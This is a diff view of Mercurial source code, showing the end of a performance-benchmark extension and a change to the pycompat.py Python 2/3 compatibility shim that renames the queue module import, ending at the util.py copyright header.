1630 allfilters = []
1621 while possiblefilters:
1631 while possiblefilters:
1622 for name in possiblefilters:
1632 for name in possiblefilters:
1623 subset = subsettable.get(name)
1633 subset = subsettable.get(name)
1624 if subset not in possiblefilters:
1634 if subset not in possiblefilters:
1625 break
1635 break
1626 else:
1636 else:
1627 assert False, 'subset cycle %s!' % possiblefilters
1637 assert False, 'subset cycle %s!' % possiblefilters
1628 allfilters.append(name)
1638 allfilters.append(name)
1629 possiblefilters.remove(name)
1639 possiblefilters.remove(name)
1630
1640
1631 # warm the cache
1641 # warm the cache
1632 if not full:
1642 if not full:
1633 for name in allfilters:
1643 for name in allfilters:
1634 repo.filtered(name).branchmap()
1644 repo.filtered(name).branchmap()
1635 if not filternames or 'unfiltered' in filternames:
1645 if not filternames or 'unfiltered' in filternames:
1636 # add unfiltered
1646 # add unfiltered
1637 allfilters.append(None)
1647 allfilters.append(None)
1638
1648
1639 branchcacheread = safeattrsetter(branchmap, 'read')
1649 branchcacheread = safeattrsetter(branchmap, 'read')
1640 branchcachewrite = safeattrsetter(branchmap.branchcache, 'write')
1650 branchcachewrite = safeattrsetter(branchmap.branchcache, 'write')
1641 branchcacheread.set(lambda repo: None)
1651 branchcacheread.set(lambda repo: None)
1642 branchcachewrite.set(lambda bc, repo: None)
1652 branchcachewrite.set(lambda bc, repo: None)
1643 try:
1653 try:
1644 for name in allfilters:
1654 for name in allfilters:
1645 printname = name
1655 printname = name
1646 if name is None:
1656 if name is None:
1647 printname = 'unfiltered'
1657 printname = 'unfiltered'
1648 timer(getbranchmap(name), title=str(printname))
1658 timer(getbranchmap(name), title=str(printname))
1649 finally:
1659 finally:
1650 branchcacheread.restore()
1660 branchcacheread.restore()
1651 branchcachewrite.restore()
1661 branchcachewrite.restore()
1652 fm.end()
1662 fm.end()
1653
1663
1654 @command('perfloadmarkers')
1664 @command('perfloadmarkers')
1655 def perfloadmarkers(ui, repo):
1665 def perfloadmarkers(ui, repo):
1656 """benchmark the time to parse the on-disk markers for a repo
1666 """benchmark the time to parse the on-disk markers for a repo
1657
1667
1658 Result is the number of markers in the repo."""
1668 Result is the number of markers in the repo."""
1659 timer, fm = gettimer(ui)
1669 timer, fm = gettimer(ui)
1660 svfs = getsvfs(repo)
1670 svfs = getsvfs(repo)
1661 timer(lambda: len(obsolete.obsstore(svfs)))
1671 timer(lambda: len(obsolete.obsstore(svfs)))
1662 fm.end()
1672 fm.end()
1663
1673
1664 @command('perflrucachedict', formatteropts +
1674 @command('perflrucachedict', formatteropts +
1665 [('', 'size', 4, 'size of cache'),
1675 [('', 'size', 4, 'size of cache'),
1666 ('', 'gets', 10000, 'number of key lookups'),
1676 ('', 'gets', 10000, 'number of key lookups'),
1667 ('', 'sets', 10000, 'number of key sets'),
1677 ('', 'sets', 10000, 'number of key sets'),
1668 ('', 'mixed', 10000, 'number of mixed mode operations'),
1678 ('', 'mixed', 10000, 'number of mixed mode operations'),
1669 ('', 'mixedgetfreq', 50, 'frequency of get vs set ops in mixed mode')],
1679 ('', 'mixedgetfreq', 50, 'frequency of get vs set ops in mixed mode')],
1670 norepo=True)
1680 norepo=True)
1671 def perflrucache(ui, size=4, gets=10000, sets=10000, mixed=10000,
1681 def perflrucache(ui, size=4, gets=10000, sets=10000, mixed=10000,
1672 mixedgetfreq=50, **opts):
1682 mixedgetfreq=50, **opts):
1673 def doinit():
1683 def doinit():
1674 for i in xrange(10000):
1684 for i in xrange(10000):
1675 util.lrucachedict(size)
1685 util.lrucachedict(size)
1676
1686
1677 values = []
1687 values = []
1678 for i in xrange(size):
1688 for i in xrange(size):
1679 values.append(random.randint(0, sys.maxint))
1689 values.append(random.randint(0, sys.maxint))
1680
1690
1681 # Get mode fills the cache and tests raw lookup performance with no
1691 # Get mode fills the cache and tests raw lookup performance with no
1682 # eviction.
1692 # eviction.
1683 getseq = []
1693 getseq = []
1684 for i in xrange(gets):
1694 for i in xrange(gets):
1685 getseq.append(random.choice(values))
1695 getseq.append(random.choice(values))
1686
1696
1687 def dogets():
1697 def dogets():
1688 d = util.lrucachedict(size)
1698 d = util.lrucachedict(size)
1689 for v in values:
1699 for v in values:
1690 d[v] = v
1700 d[v] = v
1691 for key in getseq:
1701 for key in getseq:
1692 value = d[key]
1702 value = d[key]
1693 value # silence pyflakes warning
1703 value # silence pyflakes warning
1694
1704
1695 # Set mode tests insertion speed with cache eviction.
1705 # Set mode tests insertion speed with cache eviction.
1696 setseq = []
1706 setseq = []
1697 for i in xrange(sets):
1707 for i in xrange(sets):
1698 setseq.append(random.randint(0, sys.maxint))
1708 setseq.append(random.randint(0, sys.maxint))
1699
1709
1700 def dosets():
1710 def dosets():
1701 d = util.lrucachedict(size)
1711 d = util.lrucachedict(size)
1702 for v in setseq:
1712 for v in setseq:
1703 d[v] = v
1713 d[v] = v
1704
1714
1705 # Mixed mode randomly performs gets and sets with eviction.
1715 # Mixed mode randomly performs gets and sets with eviction.
1706 mixedops = []
1716 mixedops = []
1707 for i in xrange(mixed):
1717 for i in xrange(mixed):
1708 r = random.randint(0, 100)
1718 r = random.randint(0, 100)
1709 if r < mixedgetfreq:
1719 if r < mixedgetfreq:
1710 op = 0
1720 op = 0
1711 else:
1721 else:
1712 op = 1
1722 op = 1
1713
1723
1714 mixedops.append((op, random.randint(0, size * 2)))
1724 mixedops.append((op, random.randint(0, size * 2)))
1715
1725
1716 def domixed():
1726 def domixed():
1717 d = util.lrucachedict(size)
1727 d = util.lrucachedict(size)
1718
1728
1719 for op, v in mixedops:
1729 for op, v in mixedops:
1720 if op == 0:
1730 if op == 0:
1721 try:
1731 try:
1722 d[v]
1732 d[v]
1723 except KeyError:
1733 except KeyError:
1724 pass
1734 pass
1725 else:
1735 else:
1726 d[v] = v
1736 d[v] = v
1727
1737
1728 benches = [
1738 benches = [
1729 (doinit, 'init'),
1739 (doinit, 'init'),
1730 (dogets, 'gets'),
1740 (dogets, 'gets'),
1731 (dosets, 'sets'),
1741 (dosets, 'sets'),
1732 (domixed, 'mixed')
1742 (domixed, 'mixed')
1733 ]
1743 ]
1734
1744
1735 for fn, title in benches:
1745 for fn, title in benches:
1736 timer, fm = gettimer(ui, opts)
1746 timer, fm = gettimer(ui, opts)
1737 timer(fn, title=title)
1747 timer(fn, title=title)
1738 fm.end()
1748 fm.end()
1739
1749
1740 @command('perfwrite', formatteropts)
1750 @command('perfwrite', formatteropts)
1741 def perfwrite(ui, repo, **opts):
1751 def perfwrite(ui, repo, **opts):
1742 """microbenchmark ui.write
1752 """microbenchmark ui.write
1743 """
1753 """
1744 timer, fm = gettimer(ui, opts)
1754 timer, fm = gettimer(ui, opts)
1745 def write():
1755 def write():
1746 for i in range(100000):
1756 for i in range(100000):
1747 ui.write(('Testing write performance\n'))
1757 ui.write(('Testing write performance\n'))
1748 timer(write)
1758 timer(write)
1749 fm.end()
1759 fm.end()
1750
1760
1751 def uisetup(ui):
1761 def uisetup(ui):
1752 if (util.safehasattr(cmdutil, 'openrevlog') and
1762 if (util.safehasattr(cmdutil, 'openrevlog') and
1753 not util.safehasattr(commands, 'debugrevlogopts')):
1763 not util.safehasattr(commands, 'debugrevlogopts')):
1754 # for "historical portability":
1764 # for "historical portability":
1755 # In this case, Mercurial should be 1.9 (or a79fea6b3e77) -
1765 # In this case, Mercurial should be 1.9 (or a79fea6b3e77) -
1756 # 3.7 (or 5606f7d0d063). Therefore, '--dir' option for
1766 # 3.7 (or 5606f7d0d063). Therefore, '--dir' option for
1757 # openrevlog() should cause failure, because it has been
1767 # openrevlog() should cause failure, because it has been
1758 # available since 3.5 (or 49c583ca48c4).
1768 # available since 3.5 (or 49c583ca48c4).
1759 def openrevlog(orig, repo, cmd, file_, opts):
1769 def openrevlog(orig, repo, cmd, file_, opts):
1760 if opts.get('dir') and not util.safehasattr(repo, 'dirlog'):
1770 if opts.get('dir') and not util.safehasattr(repo, 'dirlog'):
1761 raise error.Abort("This version doesn't support --dir option",
1771 raise error.Abort("This version doesn't support --dir option",
1762 hint="use 3.5 or later")
1772 hint="use 3.5 or later")
1763 return orig(repo, cmd, file_, opts)
1773 return orig(repo, cmd, file_, opts)
1764 extensions.wrapfunction(cmdutil, 'openrevlog', openrevlog)
1774 extensions.wrapfunction(cmdutil, 'openrevlog', openrevlog)
@@ -1,389 +1,386 b''
1 # pycompat.py - portability shim for python 3
1 # pycompat.py - portability shim for python 3
2 #
2 #
3 # This software may be used and distributed according to the terms of the
3 # This software may be used and distributed according to the terms of the
4 # GNU General Public License version 2 or any later version.
4 # GNU General Public License version 2 or any later version.
5
5
6 """Mercurial portability shim for python 3.
6 """Mercurial portability shim for python 3.
7
7
8 This contains aliases to hide python version-specific details from the core.
8 This contains aliases to hide python version-specific details from the core.
9 """
9 """
10
10
11 from __future__ import absolute_import
11 from __future__ import absolute_import
12
12
13 import getopt
13 import getopt
14 import inspect
14 import inspect
15 import os
15 import os
16 import shlex
16 import shlex
17 import sys
17 import sys
18
18
19 ispy3 = (sys.version_info[0] >= 3)
19 ispy3 = (sys.version_info[0] >= 3)
20 ispypy = (r'__pypy__' in sys.builtin_module_names)
20 ispypy = (r'__pypy__' in sys.builtin_module_names)
21
21
22 if not ispy3:
22 if not ispy3:
23 import cookielib
23 import cookielib
24 import cPickle as pickle
24 import cPickle as pickle
25 import httplib
25 import httplib
26 import Queue as _queue
26 import Queue as queue
27 import SocketServer as socketserver
27 import SocketServer as socketserver
28 import xmlrpclib
28 import xmlrpclib
29
29
30 from .thirdparty.concurrent import futures
30 from .thirdparty.concurrent import futures
31
31
32 def future_set_exception_info(f, exc_info):
32 def future_set_exception_info(f, exc_info):
33 f.set_exception_info(*exc_info)
33 f.set_exception_info(*exc_info)
34 else:
34 else:
35 import concurrent.futures as futures
35 import concurrent.futures as futures
36 import http.cookiejar as cookielib
36 import http.cookiejar as cookielib
37 import http.client as httplib
37 import http.client as httplib
38 import pickle
38 import pickle
39 import queue as _queue
39 import queue as queue
40 import socketserver
40 import socketserver
41 import xmlrpc.client as xmlrpclib
41 import xmlrpc.client as xmlrpclib
42
42
43 def future_set_exception_info(f, exc_info):
43 def future_set_exception_info(f, exc_info):
44 f.set_exception(exc_info[0])
44 f.set_exception(exc_info[0])
45
45
46 empty = _queue.Empty
47 queue = _queue.Queue
48
49 def identity(a):
46 def identity(a):
50 return a
47 return a
51
48
52 if ispy3:
49 if ispy3:
53 import builtins
50 import builtins
54 import functools
51 import functools
55 import io
52 import io
56 import struct
53 import struct
57
54
58 fsencode = os.fsencode
55 fsencode = os.fsencode
59 fsdecode = os.fsdecode
56 fsdecode = os.fsdecode
60 oscurdir = os.curdir.encode('ascii')
57 oscurdir = os.curdir.encode('ascii')
61 oslinesep = os.linesep.encode('ascii')
58 oslinesep = os.linesep.encode('ascii')
62 osname = os.name.encode('ascii')
59 osname = os.name.encode('ascii')
63 ospathsep = os.pathsep.encode('ascii')
60 ospathsep = os.pathsep.encode('ascii')
64 ospardir = os.pardir.encode('ascii')
61 ospardir = os.pardir.encode('ascii')
65 ossep = os.sep.encode('ascii')
62 ossep = os.sep.encode('ascii')
66 osaltsep = os.altsep
63 osaltsep = os.altsep
67 if osaltsep:
64 if osaltsep:
68 osaltsep = osaltsep.encode('ascii')
65 osaltsep = osaltsep.encode('ascii')
69 # os.getcwd() on Python 3 returns string, but it has os.getcwdb() which
66 # os.getcwd() on Python 3 returns string, but it has os.getcwdb() which
70 # returns bytes.
67 # returns bytes.
71 getcwd = os.getcwdb
68 getcwd = os.getcwdb
72 sysplatform = sys.platform.encode('ascii')
69 sysplatform = sys.platform.encode('ascii')
73 sysexecutable = sys.executable
70 sysexecutable = sys.executable
74 if sysexecutable:
71 if sysexecutable:
75 sysexecutable = os.fsencode(sysexecutable)
72 sysexecutable = os.fsencode(sysexecutable)
76 bytesio = io.BytesIO
73 bytesio = io.BytesIO
77 # TODO deprecate stringio name, as it is a lie on Python 3.
74 # TODO deprecate stringio name, as it is a lie on Python 3.
78 stringio = bytesio
75 stringio = bytesio
79
76
80 def maplist(*args):
77 def maplist(*args):
81 return list(map(*args))
78 return list(map(*args))
82
79
83 def rangelist(*args):
80 def rangelist(*args):
84 return list(range(*args))
81 return list(range(*args))
85
82
86 def ziplist(*args):
83 def ziplist(*args):
87 return list(zip(*args))
84 return list(zip(*args))
88
85
89 rawinput = input
86 rawinput = input
90 getargspec = inspect.getfullargspec
87 getargspec = inspect.getfullargspec
91
88
92 # TODO: .buffer might not exist if std streams were replaced; we'll need
89 # TODO: .buffer might not exist if std streams were replaced; we'll need
93 # a silly wrapper to make a bytes stream backed by a unicode one.
90 # a silly wrapper to make a bytes stream backed by a unicode one.
94 stdin = sys.stdin.buffer
91 stdin = sys.stdin.buffer
95 stdout = sys.stdout.buffer
92 stdout = sys.stdout.buffer
96 stderr = sys.stderr.buffer
93 stderr = sys.stderr.buffer
97
94
98 # Since Python 3 converts argv to wchar_t type by Py_DecodeLocale() on Unix,
95 # Since Python 3 converts argv to wchar_t type by Py_DecodeLocale() on Unix,
99 # we can use os.fsencode() to get back bytes argv.
96 # we can use os.fsencode() to get back bytes argv.
100 #
97 #
101 # https://hg.python.org/cpython/file/v3.5.1/Programs/python.c#l55
98 # https://hg.python.org/cpython/file/v3.5.1/Programs/python.c#l55
102 #
99 #
103 # TODO: On Windows, the native argv is wchar_t, so we'll need a different
100 # TODO: On Windows, the native argv is wchar_t, so we'll need a different
104 # workaround to simulate the Python 2 (i.e. ANSI Win32 API) behavior.
101 # workaround to simulate the Python 2 (i.e. ANSI Win32 API) behavior.
105 if getattr(sys, 'argv', None) is not None:
102 if getattr(sys, 'argv', None) is not None:
106 sysargv = list(map(os.fsencode, sys.argv))
103 sysargv = list(map(os.fsencode, sys.argv))
107
104
108 bytechr = struct.Struct('>B').pack
105 bytechr = struct.Struct('>B').pack
109 byterepr = b'%r'.__mod__
106 byterepr = b'%r'.__mod__
110
107
111 class bytestr(bytes):
108 class bytestr(bytes):
112 """A bytes which mostly acts as a Python 2 str
109 """A bytes which mostly acts as a Python 2 str
113
110
114 >>> bytestr(), bytestr(bytearray(b'foo')), bytestr(u'ascii'), bytestr(1)
111 >>> bytestr(), bytestr(bytearray(b'foo')), bytestr(u'ascii'), bytestr(1)
115 ('', 'foo', 'ascii', '1')
112 ('', 'foo', 'ascii', '1')
116 >>> s = bytestr(b'foo')
113 >>> s = bytestr(b'foo')
117 >>> assert s is bytestr(s)
114 >>> assert s is bytestr(s)
118
115
119 __bytes__() should be called if provided:
116 __bytes__() should be called if provided:
120
117
121 >>> class bytesable(object):
118 >>> class bytesable(object):
122 ... def __bytes__(self):
119 ... def __bytes__(self):
123 ... return b'bytes'
120 ... return b'bytes'
124 >>> bytestr(bytesable())
121 >>> bytestr(bytesable())
125 'bytes'
122 'bytes'
126
123
127 There's no implicit conversion from non-ascii str as its encoding is
124 There's no implicit conversion from non-ascii str as its encoding is
128 unknown:
125 unknown:
129
126
130 >>> bytestr(chr(0x80)) # doctest: +ELLIPSIS
127 >>> bytestr(chr(0x80)) # doctest: +ELLIPSIS
131 Traceback (most recent call last):
128 Traceback (most recent call last):
132 ...
129 ...
133 UnicodeEncodeError: ...
130 UnicodeEncodeError: ...
134
131
135 Comparison between bytestr and bytes should work:
132 Comparison between bytestr and bytes should work:
136
133
137 >>> assert bytestr(b'foo') == b'foo'
134 >>> assert bytestr(b'foo') == b'foo'
138 >>> assert b'foo' == bytestr(b'foo')
135 >>> assert b'foo' == bytestr(b'foo')
139 >>> assert b'f' in bytestr(b'foo')
136 >>> assert b'f' in bytestr(b'foo')
140 >>> assert bytestr(b'f') in b'foo'
137 >>> assert bytestr(b'f') in b'foo'
141
138
142 Sliced elements should be bytes, not integer:
139 Sliced elements should be bytes, not integer:
143
140
144 >>> s[1], s[:2]
141 >>> s[1], s[:2]
145 (b'o', b'fo')
142 (b'o', b'fo')
146 >>> list(s), list(reversed(s))
143 >>> list(s), list(reversed(s))
147 ([b'f', b'o', b'o'], [b'o', b'o', b'f'])
144 ([b'f', b'o', b'o'], [b'o', b'o', b'f'])
148
145
149 As bytestr type isn't propagated across operations, you need to cast
146 As bytestr type isn't propagated across operations, you need to cast
150 bytes to bytestr explicitly:
147 bytes to bytestr explicitly:
151
148
152 >>> s = bytestr(b'foo').upper()
149 >>> s = bytestr(b'foo').upper()
153 >>> t = bytestr(s)
150 >>> t = bytestr(s)
154 >>> s[0], t[0]
151 >>> s[0], t[0]
155 (70, b'F')
152 (70, b'F')
156
153
157 Be careful to not pass a bytestr object to a function which expects
154 Be careful to not pass a bytestr object to a function which expects
158 bytearray-like behavior.
155 bytearray-like behavior.
159
156
160 >>> t = bytes(t) # cast to bytes
157 >>> t = bytes(t) # cast to bytes
161 >>> assert type(t) is bytes
158 >>> assert type(t) is bytes
162 """
159 """
163
160
164 def __new__(cls, s=b''):
161 def __new__(cls, s=b''):
165 if isinstance(s, bytestr):
162 if isinstance(s, bytestr):
166 return s
163 return s
167 if (not isinstance(s, (bytes, bytearray))
164 if (not isinstance(s, (bytes, bytearray))
168 and not hasattr(s, u'__bytes__')): # hasattr-py3-only
165 and not hasattr(s, u'__bytes__')): # hasattr-py3-only
169 s = str(s).encode(u'ascii')
166 s = str(s).encode(u'ascii')
170 return bytes.__new__(cls, s)
167 return bytes.__new__(cls, s)
171
168
172 def __getitem__(self, key):
169 def __getitem__(self, key):
173 s = bytes.__getitem__(self, key)
170 s = bytes.__getitem__(self, key)
174 if not isinstance(s, bytes):
171 if not isinstance(s, bytes):
175 s = bytechr(s)
172 s = bytechr(s)
176 return s
173 return s
177
174
178 def __iter__(self):
175 def __iter__(self):
179 return iterbytestr(bytes.__iter__(self))
176 return iterbytestr(bytes.__iter__(self))
180
177
181 def __repr__(self):
178 def __repr__(self):
182 return bytes.__repr__(self)[1:] # drop b''
179 return bytes.__repr__(self)[1:] # drop b''
183
180
184 def iterbytestr(s):
181 def iterbytestr(s):
185 """Iterate bytes as if it were a str object of Python 2"""
182 """Iterate bytes as if it were a str object of Python 2"""
186 return map(bytechr, s)
183 return map(bytechr, s)
187
184
188 def maybebytestr(s):
185 def maybebytestr(s):
189 """Promote bytes to bytestr"""
186 """Promote bytes to bytestr"""
190 if isinstance(s, bytes):
187 if isinstance(s, bytes):
191 return bytestr(s)
188 return bytestr(s)
192 return s
189 return s
193
190
194 def sysbytes(s):
191 def sysbytes(s):
195 """Convert an internal str (e.g. keyword, __doc__) back to bytes
192 """Convert an internal str (e.g. keyword, __doc__) back to bytes
196
193
197 This never raises UnicodeEncodeError, but only ASCII characters
194 This never raises UnicodeEncodeError, but only ASCII characters
198 can be round-trip by sysstr(sysbytes(s)).
195 can be round-trip by sysstr(sysbytes(s)).
199 """
196 """
200 return s.encode(u'utf-8')
197 return s.encode(u'utf-8')
201
198
202 def sysstr(s):
199 def sysstr(s):
203 """Return a keyword str to be passed to Python functions such as
200 """Return a keyword str to be passed to Python functions such as
204 getattr() and str.encode()
201 getattr() and str.encode()
205
202
206 This never raises UnicodeDecodeError. Non-ascii characters are
203 This never raises UnicodeDecodeError. Non-ascii characters are
207 considered invalid and mapped to arbitrary but unique code points
204 considered invalid and mapped to arbitrary but unique code points
208 such that 'sysstr(a) != sysstr(b)' for all 'a != b'.
205 such that 'sysstr(a) != sysstr(b)' for all 'a != b'.
209 """
206 """
210 if isinstance(s, builtins.str):
207 if isinstance(s, builtins.str):
211 return s
208 return s
212 return s.decode(u'latin-1')
209 return s.decode(u'latin-1')
213
210
214 def strurl(url):
211 def strurl(url):
215 """Converts a bytes url back to str"""
212 """Converts a bytes url back to str"""
216 if isinstance(url, bytes):
213 if isinstance(url, bytes):
217 return url.decode(u'ascii')
214 return url.decode(u'ascii')
218 return url
215 return url
219
216
220 def bytesurl(url):
217 def bytesurl(url):
221 """Converts a str url to bytes by encoding in ascii"""
218 """Converts a str url to bytes by encoding in ascii"""
222 if isinstance(url, str):
219 if isinstance(url, str):
223 return url.encode(u'ascii')
220 return url.encode(u'ascii')
224 return url
221 return url
225
222
226 def raisewithtb(exc, tb):
223 def raisewithtb(exc, tb):
227 """Raise exception with the given traceback"""
224 """Raise exception with the given traceback"""
228 raise exc.with_traceback(tb)
225 raise exc.with_traceback(tb)
229
226
230 def getdoc(obj):
227 def getdoc(obj):
231 """Get docstring as bytes; may be None so gettext() won't confuse it
228 """Get docstring as bytes; may be None so gettext() won't confuse it
232 with _('')"""
229 with _('')"""
233 doc = getattr(obj, u'__doc__', None)
230 doc = getattr(obj, u'__doc__', None)
234 if doc is None:
231 if doc is None:
235 return doc
232 return doc
236 return sysbytes(doc)
233 return sysbytes(doc)
237
234
238 def _wrapattrfunc(f):
235 def _wrapattrfunc(f):
239 @functools.wraps(f)
236 @functools.wraps(f)
240 def w(object, name, *args):
237 def w(object, name, *args):
241 return f(object, sysstr(name), *args)
238 return f(object, sysstr(name), *args)
242 return w
239 return w
243
240
244 # these wrappers are automagically imported by hgloader
241 # these wrappers are automagically imported by hgloader
245 delattr = _wrapattrfunc(builtins.delattr)
242 delattr = _wrapattrfunc(builtins.delattr)
246 getattr = _wrapattrfunc(builtins.getattr)
243 getattr = _wrapattrfunc(builtins.getattr)
247 hasattr = _wrapattrfunc(builtins.hasattr)
244 hasattr = _wrapattrfunc(builtins.hasattr)
248 setattr = _wrapattrfunc(builtins.setattr)
245 setattr = _wrapattrfunc(builtins.setattr)
249 xrange = builtins.range
246 xrange = builtins.range
250 unicode = str
247 unicode = str
251
248
252 def open(name, mode='r', buffering=-1, encoding=None):
249 def open(name, mode='r', buffering=-1, encoding=None):
253 return builtins.open(name, sysstr(mode), buffering, encoding)
250 return builtins.open(name, sysstr(mode), buffering, encoding)
254
251
255 safehasattr = _wrapattrfunc(builtins.hasattr)
252 safehasattr = _wrapattrfunc(builtins.hasattr)
256
253
257 def _getoptbwrapper(orig, args, shortlist, namelist):
254 def _getoptbwrapper(orig, args, shortlist, namelist):
258 """
255 """
259 Takes bytes arguments, converts them to unicode, pass them to
256 Takes bytes arguments, converts them to unicode, pass them to
260 getopt.getopt(), convert the returned values back to bytes and then
257 getopt.getopt(), convert the returned values back to bytes and then
261 return them for Python 3 compatibility as getopt.getopt() don't accepts
258 return them for Python 3 compatibility as getopt.getopt() don't accepts
262 bytes on Python 3.
259 bytes on Python 3.
263 """
260 """
264 args = [a.decode('latin-1') for a in args]
261 args = [a.decode('latin-1') for a in args]
265 shortlist = shortlist.decode('latin-1')
262 shortlist = shortlist.decode('latin-1')
266 namelist = [a.decode('latin-1') for a in namelist]
263 namelist = [a.decode('latin-1') for a in namelist]
267 opts, args = orig(args, shortlist, namelist)
264 opts, args = orig(args, shortlist, namelist)
268 opts = [(a[0].encode('latin-1'), a[1].encode('latin-1'))
265 opts = [(a[0].encode('latin-1'), a[1].encode('latin-1'))
269 for a in opts]
266 for a in opts]
270 args = [a.encode('latin-1') for a in args]
267 args = [a.encode('latin-1') for a in args]
271 return opts, args
268 return opts, args
272
269
273 def strkwargs(dic):
270 def strkwargs(dic):
274 """
271 """
275 Converts the keys of a python dictonary to str i.e. unicodes so that
272 Converts the keys of a python dictonary to str i.e. unicodes so that
276 they can be passed as keyword arguments as dictonaries with bytes keys
273 they can be passed as keyword arguments as dictonaries with bytes keys
277 can't be passed as keyword arguments to functions on Python 3.
274 can't be passed as keyword arguments to functions on Python 3.
278 """
275 """
279 dic = dict((k.decode('latin-1'), v) for k, v in dic.iteritems())
276 dic = dict((k.decode('latin-1'), v) for k, v in dic.iteritems())
280 return dic
277 return dic
281
278
282 def byteskwargs(dic):
279 def byteskwargs(dic):
283 """
280 """
284 Converts keys of python dictonaries to bytes as they were converted to
281 Converts keys of python dictonaries to bytes as they were converted to
285 str to pass that dictonary as a keyword argument on Python 3.
282 str to pass that dictonary as a keyword argument on Python 3.
286 """
283 """
287 dic = dict((k.encode('latin-1'), v) for k, v in dic.iteritems())
284 dic = dict((k.encode('latin-1'), v) for k, v in dic.iteritems())
288 return dic
285 return dic
289
286
290 # TODO: handle shlex.shlex().
287 # TODO: handle shlex.shlex().
291 def shlexsplit(s, comments=False, posix=True):
288 def shlexsplit(s, comments=False, posix=True):
292 """
289 """
293 Takes bytes argument, convert it to str i.e. unicodes, pass that into
290 Takes bytes argument, convert it to str i.e. unicodes, pass that into
294 shlex.split(), convert the returned value to bytes and return that for
291 shlex.split(), convert the returned value to bytes and return that for
295 Python 3 compatibility as shelx.split() don't accept bytes on Python 3.
292 Python 3 compatibility as shelx.split() don't accept bytes on Python 3.
296 """
293 """
297 ret = shlex.split(s.decode('latin-1'), comments, posix)
294 ret = shlex.split(s.decode('latin-1'), comments, posix)
298 return [a.encode('latin-1') for a in ret]
295 return [a.encode('latin-1') for a in ret]
299
296
300 def emailparser(*args, **kwargs):
297 def emailparser(*args, **kwargs):
301 import email.parser
298 import email.parser
302 return email.parser.BytesParser(*args, **kwargs)
299 return email.parser.BytesParser(*args, **kwargs)
303
300
304 else:
301 else:
305 import cStringIO
302 import cStringIO
306
303
307 bytechr = chr
304 bytechr = chr
308 byterepr = repr
305 byterepr = repr
309 bytestr = str
306 bytestr = str
310 iterbytestr = iter
307 iterbytestr = iter
311 maybebytestr = identity
308 maybebytestr = identity
312 sysbytes = identity
309 sysbytes = identity
313 sysstr = identity
310 sysstr = identity
314 strurl = identity
311 strurl = identity
315 bytesurl = identity
312 bytesurl = identity
316
313
317 # this can't be parsed on Python 3
314 # this can't be parsed on Python 3
318 exec('def raisewithtb(exc, tb):\n'
315 exec('def raisewithtb(exc, tb):\n'
319 ' raise exc, None, tb\n')
316 ' raise exc, None, tb\n')
320
317
321 def fsencode(filename):
318 def fsencode(filename):
322 """
319 """
323 Partial backport from os.py in Python 3, which only accepts bytes.
320 Partial backport from os.py in Python 3, which only accepts bytes.
324 In Python 2, our paths should only ever be bytes, a unicode path
321 In Python 2, our paths should only ever be bytes, a unicode path
325 indicates a bug.
322 indicates a bug.
326 """
323 """
327 if isinstance(filename, str):
324 if isinstance(filename, str):
328 return filename
325 return filename
329 else:
326 else:
330 raise TypeError(
327 raise TypeError(
331 "expect str, not %s" % type(filename).__name__)
328 "expect str, not %s" % type(filename).__name__)
332
329
333 # In Python 2, fsdecode() has a very chance to receive bytes. So it's
330 # In Python 2, fsdecode() has a very chance to receive bytes. So it's
334 # better not to touch Python 2 part as it's already working fine.
331 # better not to touch Python 2 part as it's already working fine.
335 fsdecode = identity
332 fsdecode = identity
336
333
337 def getdoc(obj):
334 def getdoc(obj):
338 return getattr(obj, '__doc__', None)
335 return getattr(obj, '__doc__', None)
339
336
340 _notset = object()
337 _notset = object()
341
338
342 def safehasattr(thing, attr):
339 def safehasattr(thing, attr):
343 return getattr(thing, attr, _notset) is not _notset
340 return getattr(thing, attr, _notset) is not _notset
344
341
345 def _getoptbwrapper(orig, args, shortlist, namelist):
342 def _getoptbwrapper(orig, args, shortlist, namelist):
346 return orig(args, shortlist, namelist)
343 return orig(args, shortlist, namelist)
347
344
348 strkwargs = identity
345 strkwargs = identity
349 byteskwargs = identity
346 byteskwargs = identity
350
347
351 oscurdir = os.curdir
348 oscurdir = os.curdir
352 oslinesep = os.linesep
349 oslinesep = os.linesep
353 osname = os.name
350 osname = os.name
354 ospathsep = os.pathsep
351 ospathsep = os.pathsep
355 ospardir = os.pardir
352 ospardir = os.pardir
356 ossep = os.sep
353 ossep = os.sep
357 osaltsep = os.altsep
354 osaltsep = os.altsep
358 stdin = sys.stdin
355 stdin = sys.stdin
359 stdout = sys.stdout
356 stdout = sys.stdout
360 stderr = sys.stderr
357 stderr = sys.stderr
361 if getattr(sys, 'argv', None) is not None:
358 if getattr(sys, 'argv', None) is not None:
362 sysargv = sys.argv
359 sysargv = sys.argv
363 sysplatform = sys.platform
360 sysplatform = sys.platform
364 getcwd = os.getcwd
361 getcwd = os.getcwd
365 sysexecutable = sys.executable
362 sysexecutable = sys.executable
366 shlexsplit = shlex.split
363 shlexsplit = shlex.split
367 bytesio = cStringIO.StringIO
364 bytesio = cStringIO.StringIO
368 stringio = bytesio
365 stringio = bytesio
369 maplist = map
366 maplist = map
370 rangelist = range
367 rangelist = range
371 ziplist = zip
368 ziplist = zip
372 rawinput = raw_input
369 rawinput = raw_input
373 getargspec = inspect.getargspec
370 getargspec = inspect.getargspec
374
371
375 def emailparser(*args, **kwargs):
372 def emailparser(*args, **kwargs):
376 import email.parser
373 import email.parser
377 return email.parser.Parser(*args, **kwargs)
374 return email.parser.Parser(*args, **kwargs)
378
375
379 isjython = sysplatform.startswith('java')
376 isjython = sysplatform.startswith('java')
380
377
381 isdarwin = sysplatform == 'darwin'
378 isdarwin = sysplatform == 'darwin'
382 isposix = osname == 'posix'
379 isposix = osname == 'posix'
383 iswindows = osname == 'nt'
380 iswindows = osname == 'nt'
384
381
385 def getoptb(args, shortlist, namelist):
382 def getoptb(args, shortlist, namelist):
386 return _getoptbwrapper(getopt.getopt, args, shortlist, namelist)
383 return _getoptbwrapper(getopt.getopt, args, shortlist, namelist)
387
384
388 def gnugetoptb(args, shortlist, namelist):
385 def gnugetoptb(args, shortlist, namelist):
389 return _getoptbwrapper(getopt.gnu_getopt, args, shortlist, namelist)
386 return _getoptbwrapper(getopt.gnu_getopt, args, shortlist, namelist)
@@ -1,3876 +1,3874 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
